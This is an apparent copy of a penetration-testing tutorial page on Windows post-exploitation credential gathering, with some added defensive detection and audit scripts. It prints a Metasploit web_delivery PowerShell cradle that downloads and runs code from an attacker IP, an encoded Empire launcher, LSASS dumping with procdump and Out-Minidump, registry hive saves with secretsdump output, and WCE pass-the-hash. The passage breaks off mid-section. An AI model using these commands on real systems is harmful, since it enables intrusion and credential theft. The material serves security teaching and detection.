forked from bitvijays/bitvijays.github.io
LFF-IPS-P4-PostExploitation.html
<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-92365403-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
<title>Infrastructure PenTest Series : Part 4 - Post Exploitation — tech.bitvijays.com</title>
<link rel="stylesheet" href="_static/bizstyle.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
<script type="text/javascript" id="documentation_options" data-url_root="./" src="_static/documentation_options.js"></script>
<script type="text/javascript" src="_static/jquery.js"></script>
<script type="text/javascript" src="_static/underscore.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<script type="text/javascript" src="_static/disqus.js"></script>
<script type="text/javascript" src="_static/bizstyle.js"></script>
<link rel="search" title="Search" href="search.html" />
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<!--[if lt IE 9]>
<script type="text/javascript" src="_static/css3-mediaqueries.js"></script>
<![endif]-->
</head><body>
<div class="sphinxsidebar" role="navigation" aria-label="main navigation">
<div class="sphinxsidebarwrapper">
<h3><a href="index.html">Table Of Contents</a></h3>
<ul>
<li><a class="reference internal" href="#">Infrastructure PenTest Series : Part 4 - Post Exploitation</a><ul>
<li><a class="reference internal" href="#gather-windows-credentials">Gather Windows Credentials</a><ul>
<li><a class="reference internal" href="#metasploit-web-delivery">Metasploit Web Delivery</a></li>
<li><a class="reference internal" href="#powershell-empire">Powershell Empire</a></li>
<li><a class="reference internal" href="#dump-lsass-exe-local-security-authority-subsystem-service">Dump Lsass.exe (Local Security Authority Subsystem Service)</a><ul>
<li><a class="reference internal" href="#procdump">Procdump</a></li>
<li><a class="reference internal" href="#powershell-out-minidump">Powershell Out-MiniDump</a></li>
</ul>
</li>
<li><a class="reference internal" href="#registry-hives">Registry Hives</a></li>
<li><a class="reference internal" href="#windows-credential-editor-wce">Windows Credential Editor (WCE)</a><ul>
<li><a class="reference internal" href="#list-ntlm-credentials-in-memory">List NTLM credentials in memory</a></li>
<li><a class="reference internal" href="#create-a-new-logon-session">Create a new logon session</a></li>
<li><a class="reference internal" href="#write-hashes-obtained-by-wce-to-a-file">Write hashes obtained by WCE to a file?</a></li>
<li><a class="reference internal" href="#dump-logon-cleartext-passwords-with-wce">Dump logon cleartext passwords with WCE?</a></li>
<li><a class="reference internal" href="#useful-information">Useful Information</a></li>
</ul>
</li>
<li><a class="reference internal" href="#system-security-sam-file">System/ Security /SAM File</a><ul>
<li><a class="reference internal" href="#id3">creddump7</a></li>
</ul>
</li>
<li><a class="reference internal" href="#virtual-machine-snapshots-and-suspended-states-vmss2core">Virtual Machine Snapshots And Suspended States - Vmss2core</a></li>
<li><a class="reference internal" href="#active-directory-built-in-groups-self-elevation">Active Directory Built-In Groups Self-Elevation</a><ul>
<li><a class="reference internal" href="#built-in-administrators-to-ea-da">Built-In Administrators to EA/DA</a></li>
<li><a class="reference internal" href="#server-operators-elevate-to-ea-da-ba">Server Operators elevate to EA/DA/BA</a></li>
<li><a class="reference internal" href="#account-operators-elevate-to-privileged-group-via-nested-group">Account Operators elevate to privileged group via nested group</a></li>
<li><a class="reference internal" href="#member-of-backup-operators-elevate-to-administrators">Member of Backup Operators elevate to Administrators</a></li>
</ul>
</li>
</ul>
</li>
<li><a class="reference internal" href="#high-impact-exploitation">High Impact Exploitation</a><ul>
<li><a class="reference internal" href="#outlook-data-file-pst">Outlook data file .pst</a></li>
<li><a class="reference internal" href="#pillage-exchange">Pillage Exchange</a><ul>
<li><a class="reference internal" href="#full-access-to-the-targeted-users-mailbox">Full access to the targeted user’s mailbox</a></li>
<li><a class="reference internal" href="#search-mailbox-cmdlet">Search-Mailbox cmdlet</a></li>
</ul>
</li>
<li><a class="reference internal" href="#file-servers">File Servers</a></li>
<li><a class="reference internal" href="#active-directory-database-credentials">Active Directory Database Credentials</a></li>
<li><a class="reference internal" href="#c-level-executive-webcam-microphone-user-activity-recording">C-Level Executive - Webcam, Microphone, User Activity Recording</a><ul>
<li><a class="reference internal" href="#webcam">Webcam</a></li>
<li><a class="reference internal" href="#record-mic">Record_Mic</a></li>
<li><a class="reference internal" href="#user-activity">User Activity</a></li>
</ul>
</li>
<li><a class="reference internal" href="#hypervisor">Hypervisor</a></li>
<li><a class="reference internal" href="#targeted-hunting">Targeted Hunting</a><ul>
<li><a class="reference internal" href="#microsofts-system-center-configuration-manager">Microsoft’s System Center Configuration Manager</a></li>
<li><a class="reference internal" href="#microsoft-system-center-operations-manager">Microsoft System Center Operations Manager</a></li>
<li><a class="reference internal" href="#puppet">Puppet</a></li>
<li><a class="reference internal" href="#credmap-the-credential-mapper">Credmap: The credential Mapper</a></li>
</ul>
</li>
</ul>
</li>
<li><a class="reference internal" href="#appendix-i-windows-credentials">Appendix-I : Windows Credentials</a><ul>
<li><a class="reference internal" href="#terminology-authentication-credentials-and-authenticators">Terminology: authentication, credentials, and authenticators</a></li>
<li><a class="reference internal" href="#credentials-in-windows-operating-systems">Credentials in Windows operating systems</a><ul>
<li><a class="reference internal" href="#identities-usernames">Identities - usernames</a></li>
<li><a class="reference internal" href="#windows-authenticators">Windows authenticators</a></li>
<li><a class="reference internal" href="#credential-storage">Credential Storage</a></li>
<li><a class="reference internal" href="#windows-authentication-protocols">Windows authentication protocols</a></li>
</ul>
</li>
</ul>
</li>
<li><a class="reference internal" href="#appendix-ii-cracking-hashes">Appendix-II Cracking Hashes</a><ul>
<li><a class="reference internal" href="#john-the-ripper">John The Ripper</a><ul>
<li><a class="reference internal" href="#lm-nt-nt-hashes">LM:NT/ NT-Hashes</a></li>
<li><a class="reference internal" href="#korelogic-rules">Korelogic Rules</a></li>
<li><a class="reference internal" href="#loopback">Loopback?</a></li>
<li><a class="reference internal" href="#password-statistics">Password Statistics</a></li>
</ul>
</li>
</ul>
</li>
<li><a class="reference internal" href="#appendix-iii-interesting-stories">Appendix-III Interesting Stories</a><ul>
<li><a class="reference internal" href="#tools">Tools</a></li>
</ul>
</li>
<li><a class="reference internal" href="#changelog">Changelog</a></li>
</ul>
</li>
</ul>
</div>
</div>
<div class="document">
<div class="documentwrapper">
<div class="bodywrapper">
<div class="body" role="main">
<div class="section" id="infrastructure-pentest-series-part-4-post-exploitation">
<h1>Infrastructure PenTest Series : Part 4 - Post Exploitation<a class="headerlink" href="#infrastructure-pentest-series-part-4-post-exploitation" title="Permalink to this headline">¶</a></h1>
<p>In the previous post we learned how to obtain an authenticated remote shell on Windows. In this post we look at how to <a class="reference internal" href="#gather-windows-credentials"><span class="std std-ref">Gather Windows Credentials</span></a> once we have that shell, and at <a class="reference internal" href="#high-impact-post-exploitation"><span class="std std-ref">High Impact Exploitation</span></a>: post-exploitation whose results matter to the organization's senior management. <a class="reference internal" href="#a1-windows-credentials"><span class="std std-ref">Appendix-I : Windows Credentials</span></a> explains authentication, credentials and authenticators, credential storage, authentication protocols and logon types. <a class="reference internal" href="#a2-cracking-hashes"><span class="std std-ref">Appendix-II Cracking Hashes</span></a> covers cracking Windows Active Directory LM:NT hashes, and <a class="reference internal" href="#a3-interesting-stories"><span class="std std-ref">Appendix-III Interesting Stories</span></a> collects blog links that may help during post-exploitation.</p>
<div class="section" id="gather-windows-credentials">
<span id="id1"></span><h2>Gather Windows Credentials<a class="headerlink" href="#gather-windows-credentials" title="Permalink to this headline">¶</a></h2>
<p>Once we have an administrative remote shell, the next task is to gather every password we can, clear-text or hashed, from the Security Accounts Manager (SAM) database, the Local Security Authority Subsystem Service (LSASS) process memory, the Active Directory database (domain controllers only), the Credential Manager (CredMan) store and the LSA Secrets in the registry. Much of this is already covered in <a class="reference external" href="http://netsec.ws/?p=314">Obtaining Windows Passwords</a>, <a class="reference external" href="https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/">Dumping Windows Credential</a> and Bernardo Damele's series Dump Windows password hashes efficiently: <a class="reference external" href="http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes.html">Part1</a>, <a class="reference external" href="http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes_16.html">Part2</a>, <a class="reference external" href="http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes_20.html">Part3</a>, <a class="reference external" href="http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes_21.html">Part4</a>, <a class="reference external" href="http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes_28.html">Part5</a> and <a class="reference external" href="http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes_29.html">Part6</a>.</p>
<p>We have tried to combine all the methods in one post (some, such as fgdump and pwdump, are not covered). For the full list of methods, see <a class="reference external" href="https://attack.mitre.org/wiki/Technique/T1003">Credential Dumping</a> on ATT&CK.</p>
<p>Back to credential dumping: once we have a remote shell, there are several ways to do it:</p>
<ul class="simple">
<li>Get metasploit meterpreter by using Web Delivery method and run mimikatz</li>
<li>Get powershell empire agent by using powershell launcher string and run mimikatz</li>
<li>Execute Windows Credential Editor (WCE)</li>
<li>Dumping Local Security Authority Subsystem Service</li>
<li>Dumping Registry Hives</li>
<li>Dumping System/ Security/ SAM File</li>
<li>Virtual Machine Snapshots and Suspended States - Vmss2core</li>
</ul>
<div class="section" id="metasploit-web-delivery">
<h3>Metasploit Web Delivery<a class="headerlink" href="#metasploit-web-delivery" title="Permalink to this headline">¶</a></h3>
<p><a class="reference external" href="https://www.offensive-security.com/metasploit-unleashed/web-delivery/">Metasploit Web Delivery</a> : Metasploit’s Web Delivery Script is a versatile module that starts a server on the attacking machine which hosts a payload. When the victim connects to that server, the payload is executed on the victim machine. The module has a PowerShell target (PSH) which generates a one-liner that has to be executed on the remote Windows machine.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > show targets
Exploit targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf exploit(web_delivery) > set lhost 14.97.131.138
lhost => 14.97.131.138
msf exploit(web_delivery) > run
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://14.97.131.138:8443
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/uMOKs6wtlYL
[*] Local IP: http://14.97.131.138:8080/uMOKs6wtlYL
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $X=new-object net.webclient;$X.proxy=[Net.WebRequest]::GetSystemWebProxy();$X.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $X.downloadstring('http://14.97.131.138:8080/uMOKs6wtlYL');
</pre></div>
</div>
<p>When one of the following commands is executed on the remote Windows machine (without a proxy):</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>powershell.exe -nop -w hidden -c $X=new-object net.webclient;IEX $X.downloadstring('http://14.97.131.138:8080/uMOKs6wtlYL');
</pre></div>
</div>
<p>or (with a proxy):</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>powershell.exe -nop -w hidden -c $X=new-object net.webclient;$X.proxy=[Net.WebRequest]::GetSystemWebProxy();$X.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $X.downloadstring('http://14.97.131.138:8080/uMOKs6wtlYL');
</pre></div>
</div>
<p>we should get a meterpreter session.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>Delivery web_delivery payload
meterpreter >
</pre></div>
</div>
<p>Once we have the meterpreter session, we can use mimikatz or kiwi to dump all the credentials.</p>
</div>
<div class="section" id="powershell-empire">
<h3>Powershell Empire<a class="headerlink" href="#powershell-empire" title="Permalink to this headline">¶</a></h3>
<p><a class="reference external" href="https://www.powershellempire.com/">Powershell Empire agent</a> : Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.</p>
<p>After creating a listener, we just need to create a launcher using stager:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>(Empire: listeners) > usestager launcher
(Empire: stager/launcher) > set Listener test
(Empire: stager/launcher) > generate
powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAHkAUwB0AGUAbQAuAE4ARQBUAMAA7ACQAdwBDAD0ATgBFAFcALQBPAGIASgBlAGMAVAAgAFMAeQBTAFQAZQBNAC4ATgBlAHQALgBXAEUAQgBDAGwASQBFAG4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAG*snip*4AOQA3AC4AMQAzADEALgAxADMAOAA6ADgAMAA4ADAALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABPAFIAJABLAFsAJABJACsAKwAlACQASwAuAEwAZQBOAEcAdABIAF0AfQA7AEkARQBYACAAKAAkAEIALQBKAG8ASQBOACcAJwApAA==
</pre></div>
</div>
<p>When the above command is executed on the remote Windows shell, we should get a PowerShell agent back:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>(Empire) > [+] Initial agent 2FTFYMKDFSSFS from 192.168.42.5 now active
</pre></div>
</div>
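<p>Both launcher strings above are download cradles: the Web Delivery one-liner fetches and IEX-executes a script, and the Empire launcher hides the same kind of cradle behind -Enc (base64 of UTF-16LE). The triage helper below, an added example that is not part of the original post nor of Metasploit or Empire, decodes an encoded command line and lists the indicators a detection rule keys on; the encoded sample is constructed and its URL is assumed.</p>

```python
"""Triage helper for PowerShell launcher strings such as the Web Delivery and
Empire stagers shown above: decodes -Enc/-EncodedCommand (base64 of UTF-16LE)
and lists the download-cradle indicators a detection rule keys on.
Added example; not part of the original post, Metasploit or Empire."""
import base64
import re
from typing import Optional

# Indicators taken from the launcher strings on this page (case-insensitive).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.I),
    "non_interactive": re.compile(r"-noni(?:nteractive)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|n\w*)?\b", re.I),
    "webclient": re.compile(r"net\.webclient", re.I),
    "downloadstring": re.compile(r"downloadstring", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "system_proxy": re.compile(r"getsystemwebproxy|defaultcredentials", re.I),
}
ENC_FLAG = re.compile(r"-e(?:c|n\w*)?$", re.I)   # -e, -ec, -enc, -encodedcommand


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -Enc/-EncodedCommand, or None."""
    tokens = cmdline.split()
    for flag, blob in zip(tokens, tokens[1:]):
        if ENC_FLAG.match(flag):
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None   # not valid base64/UTF-16LE: leave it to the analyst
    return None


def triage(cmdline: str) -> dict:
    """Decode any encoded payload, then collect indicator hits on the whole text."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"decoded": decoded, "indicators": hits, "suspicious": len(hits) >= 3}


def _encode_for_powershell(script: str) -> str:
    """Only used to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: the no-proxy Web Delivery one-liner from this page, an
# -Enc launcher built the way the Empire stager is (assumed URL), and a benign line.
SAMPLE_PLAIN = ("powershell.exe -nop -w hidden -c $X=new-object net.webclient;"
                "IEX $X.downloadstring('http://14.97.131.138:8080/uMOKs6wtlYL');")
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1:8080/index.asp')"
SAMPLE_ENCODED = ("powershell.exe -NoP -sta -NonI -W Hidden -Enc "
                  + _encode_for_powershell(SAMPLE_SCRIPT))
SAMPLE_BENIGN = r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"

if __name__ == "__main__":
    for sample in (SAMPLE_PLAIN, SAMPLE_ENCODED, SAMPLE_BENIGN):
        print(triage(sample))
```

Feed it the CommandLine field of process-creation events (Sysmon EID 1, Security 4688); a hit on three or more indicators is worth an analyst's look even when the encoded blob itself is unreadable.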
<p>Sometimes the above two fail to work, in which case we fall back to the older techniques:</p>
</div>
<div class="section" id="dump-lsass-exe-local-security-authority-subsystem-service">
<h3>Dump Lsass.exe (Local Security Authority Subsystem Service)<a class="headerlink" href="#dump-lsass-exe-local-security-authority-subsystem-service" title="Permalink to this headline">¶</a></h3>
<div class="section" id="procdump">
<h4>Procdump<a class="headerlink" href="#procdump" title="Permalink to this headline">¶</a></h4>
<p>This method has been described in <a class="reference external" href="https://cyberarms.wordpress.com/2015/03/16/grabbing-passwords-from-memory-using-procdump-and-mimikatz/">Grabbing Passwords from Memory using Procdump and Mimikatz</a>, <a class="reference external" href="https://adsecurity.org/?p=462">How Attackers Extract Credentials (Hashes) From LSASS</a>, <a class="reference external" href="http://carnal0wnage.attackresearch.com/2013/07/mimikatz-minidump-and-mimikatz-via-bat.html">Mimikatz Minidump and mimikatz via bat file</a>, <a class="reference external" href="http://c0d3xpl0it.blogspot.in/2016/04/extracting-clear-text-passwords-using-procdump-and-mimikatz.html">Extracting Clear Text Passwords Using Procdump and Mimikatz</a> and <a class="reference external" href="http://www.fuzzysecurity.com/tutorials/18.html">I’ll Get Your Credentials … Later!</a></p>
<ul class="simple">
<li>First, upload <a class="reference external" href="https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx">ProcDump.exe</a> to the remote computer, for example over SMB or with Windows Explorer.</li>
<li>Second, from the remote shell, execute:</li>
</ul>
<blockquote>
<div><div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\Windows\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp => For 32 bit system
C:\Windows\temp\procdump.exe -accepteula -ma -64 lsass.exe lsass.dmp => For 64 bit system
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Download lsass.dmp and use mimikatz to extract the passwords from it.</li>
</ul>
</div>
<div class="section" id="powershell-out-minidump">
<h4>Powershell Out-MiniDump<a class="headerlink" href="#powershell-out-minidump" title="Permalink to this headline">¶</a></h4>
<p>This method is the Procdump one done from PowerShell: instead of procdump we use <a class="reference external" href="https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1">Out-MiniDump.ps1</a> from PowerSploit.</p>
<ul class="simple">
<li>Launch PowerShell and <a class="reference external" href="http://ss64.com/ps/source.html">dot source</a> the function from Out-Minidump.ps1:</li>
</ul>
<blockquote>
<div><div class="highlight-None notranslate"><div class="highlight"><pre><span></span>. c:\path\to\Out-Minidump.ps1
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Create dump of the process using this syntax:</li>
</ul>
<blockquote>
<div><div class="highlight-None notranslate"><div class="highlight"><pre><span></span>Get-Process lsass | Out-Minidump -DumpFilePath C:\Windows\Temp
</pre></div>
</div>
</div></blockquote>
</div>
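<p>Both dumping methods above (procdump -ma lsass.exe and Out-Minidump) have to open a handle to lsass.exe that carries PROCESS_VM_READ, which Sysmon records as Event ID 10 (ProcessAccess) with SourceImage, TargetImage and GrantedAccess. The detection below is an added example, not from the original post; the log records are constructed and the allow-list values are assumed.</p>

```python
"""Detection logic for the LSASS dumping methods above (procdump -ma lsass.exe,
PowerSploit Out-Minidump): both must open lsass.exe with PROCESS_VM_READ, which
Sysmon logs as Event ID 10 (ProcessAccess) with SourceImage, TargetImage and
GrantedAccess. Added example, not from the original post; the records below
are constructed, not real telemetry."""
import json

PROCESS_VM_READ = 0x0010   # required by MiniDumpWriteDump / ReadProcessMemory

# Processes that legitimately read LSASS memory (AV/EDR, parts of Windows).
# Assumed values: a real deployment tunes this list per environment.
ALLOWED_SOURCES = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}


def is_lsass_read(event: dict) -> bool:
    """True when a non-allow-listed process obtains VM_READ on lsass.exe."""
    if event.get("EventID") != 10:
        return False
    if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    if event.get("SourceImage", "").lower() in ALLOWED_SOURCES:
        return False
    granted = int(event.get("GrantedAccess", "0x0"), 16)   # e.g. "0x1FFFFF"
    return bool(granted & PROCESS_VM_READ)


def scan(lines):
    """Return (SourceImage, GrantedAccess) for every JSON-per-line record that matches."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        event = json.loads(line)
        if is_lsass_read(event):
            alerts.append((event["SourceImage"], event["GrantedAccess"]))
    return alerts


# Constructed sample in Sysmon EID 10 field names, one JSON object per line.
# 0x1FFFFF is PROCESS_ALL_ACCESS (what procdump asks for); 0x1410 is
# QUERY_LIMITED_INFORMATION|QUERY_INFORMATION|VM_READ, the minimum a
# MiniDumpWriteDump-style dumper needs; 0x1000 alone cannot read memory.
SAMPLE_LOG = r"""
{"EventID": 10, "SourceImage": "C:\\Windows\\temp\\procdump.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1410"}
{"EventID": 10, "SourceImage": "C:\\Program Files\\Windows Defender\\MsMpEng.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\Taskmgr.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1000"}
{"EventID": 1, "Image": "C:\\Windows\\temp\\procdump.exe", "CommandLine": "procdump.exe -accepteula -ma lsass.exe lsass.dmp"}
"""


def scan_sample():
    """Run the detection over the constructed records."""
    return scan(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for source, access in scan_sample():
        print(f"ALERT: lsass.exe memory read by {source} (GrantedAccess {access})")
```

On the sample only the procdump and powershell handles fire; the Defender engine is allow-listed and Task Manager's 0x1000 handle lacks VM_READ.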
</div>
<div class="section" id="registry-hives">
<h3>Registry Hives<a class="headerlink" href="#registry-hives" title="Permalink to this headline">¶</a></h3>
<p>Save copies of the SYSTEM, SECURITY and SAM hives and download them to your local system:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\> reg.exe save hklm\sam c:\temp\sam.save
C:\> reg.exe save hklm\security c:\temp\security.save
C:\> reg.exe save hklm\system c:\temp\system.save
</pre></div>
</div>
<p>Then get the password hashes of the local accounts, the cached domain credentials and the LSA secrets in a single run with Impacket’s secretsdump.py:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.11-dev - Copyright 2002-2013 Core Security Technologies
[*] Target system bootKey: 0x602e8c2947d56a95bf9cfxxxxxxxxxxx
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
admsys :500 :aad3b435b51404eeaad3b435b51404ee:3e24dcead23468ce597d68xxxxxxxxxx:::
Guest :501 :aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59dxxxxxxxxx:::
support :1000:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b5xxxxxxxxx:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
adm2:6ec74661650377df488415415bf10321:system1.example.com:EXAMPLE:::
Administrator:c4a850e0fee5af324a57fd2eeb8dbd24:system2.example.COM:EXAMPLE:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9adxxxxxxxxxx
</pre></div>
</div>
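<p>The SAM lines in that output are in pwdump layout (user:rid:lmhash:nthash:::), which is also what John reads. The audit helper below, an added example that is not part of the original post or of Impacket, turns such a dump into the findings a defender reports afterwards: blank passwords, LM hashes still being stored, a renamed built-in Administrator and NT hashes shared between accounts. The sample dump is constructed, with the page's redacted hashes padded out with made-up hex.</p>

```python
"""Audit helper for the pwdump-style SAM lines secretsdump.py prints above
(user:rid:lmhash:nthash:::). Reports what a defender wants from such a dump:
blank passwords, LM hashes still being stored, a renamed built-in Administrator
and NT hashes shared between accounts (password reuse).
Added example; not part of the original post or of Impacket."""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
SAM_LINE = re.compile(
    r"^(?P<user>[^:]+?)\s*:\s*(?P<rid>\d+)\s*:\s*(?P<lm>[0-9a-f]{32})\s*:\s*(?P<nt>[0-9a-f]{32}):::\s*$",
    re.I)


def parse_sam_line(line: str):
    """Parse one SAM hash line; status lines, cached creds and LSA secrets give None."""
    m = SAM_LINE.match(line)
    if not m:
        return None
    return {"user": m["user"], "rid": int(m["rid"]),
            "lm": m["lm"].lower(), "nt": m["nt"].lower()}


def audit(lines):
    """Return (account, finding) pairs for a whole secretsdump output."""
    findings = []
    users_by_nt = defaultdict(list)
    for line in lines:
        rec = parse_sam_line(line)
        if rec is None:
            continue
        if rec["nt"] == EMPTY_NT:
            # secretsdump does not show whether the account is disabled; verify that.
            findings.append((rec["user"], "blank password"))
        if rec["lm"] != EMPTY_LM:
            findings.append((rec["user"], "LM hash stored"))
        if rec["rid"] == 500 and rec["user"].lower() != "administrator":
            findings.append((rec["user"], "built-in Administrator (RID 500) renamed"))
        users_by_nt[rec["nt"]].append(rec["user"])
    for nt, users in users_by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings.append((",".join(users), "same NT hash: password reuse"))
    return findings


# Constructed sample in the layout shown above. The page's redacted hashes are
# padded out with made-up hex; legacysvc's LM hash is the one from the WCE
# example further down (a short password, so the second half is the empty block).
SAMPLE_DUMP = """\
[*] Target system bootKey: 0x602e8c2947d56a95bf9cfxxxxxxxxxxx
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
admsys :500 :aad3b435b51404eeaad3b435b51404ee:3e24dcead23468ce597d6800000000ab:::
Guest :501 :aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
support :1000:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b5000000000:::
legacysvc:1001:01fc5a6be7bc6929aad3b435b51404ee:3e24dcead23468ce597d6800000000ab:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
adm2:6ec74661650377df488415415bf10321:system1.example.com:EXAMPLE:::
[*] Dumping LSA Secrets
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ad000000000000
"""


def audit_sample():
    """Run the audit over the constructed dump."""
    return audit(SAMPLE_DUMP.splitlines())


if __name__ == "__main__":
    for account, finding in audit_sample():
        print(f"{account}: {finding}")
```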
</div>
<div class="section" id="windows-credential-editor-wce">
<h3>Windows Credential Editor (WCE)<a class="headerlink" href="#windows-credential-editor-wce" title="Permalink to this headline">¶</a></h3>
<p>Windows Credentials Editor (WCE) is a security tool that allows you to list Windows logon sessions and to add, change, list and delete the credentials associated with them (e.g. LM/NT hashes, Kerberos tickets and cleartext passwords).</p>
<p>The tool allows users to:</p>
<ul class="simple">
<li>Perform Pass-the-Hash on Windows</li>
<li>‘Steal’ NTLM credentials from memory (with and without code injection)</li>
<li>‘Steal’ Kerberos Tickets from Windows machines</li>
<li>Use the ‘stolen’ kerberos Tickets on other Windows or Unix machines to gain access to systems and services</li>
<li>Dump cleartext passwords stored by Windows authentication packages</li>
</ul>
<p><strong>Examples</strong></p>
<div class="section" id="list-ntlm-credentials-in-memory">
<h4>List NTLM credentials in memory<a class="headerlink" href="#list-ntlm-credentials-in-memory" title="Permalink to this headline">¶</a></h4>
<p>By default, WCE lists NTLM credentials in memory, no need to specify any options.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\Users\test>wce.exe
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
theuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
</pre></div>
</div>
</div>
<div class="section" id="create-a-new-logon-session">
<h4>Create a new logon session<a class="headerlink" href="#create-a-new-logon-session" title="Permalink to this headline">¶</a></h4>
<p>To create a new logon session and launch a program with new NTLM credentials:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>
</pre></div>
</div>
<p>Example:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c cmd.exe
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Changing NTLM credentials of new logon session (000118914h) to:
Username: testuser
domain: amplialabs
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE
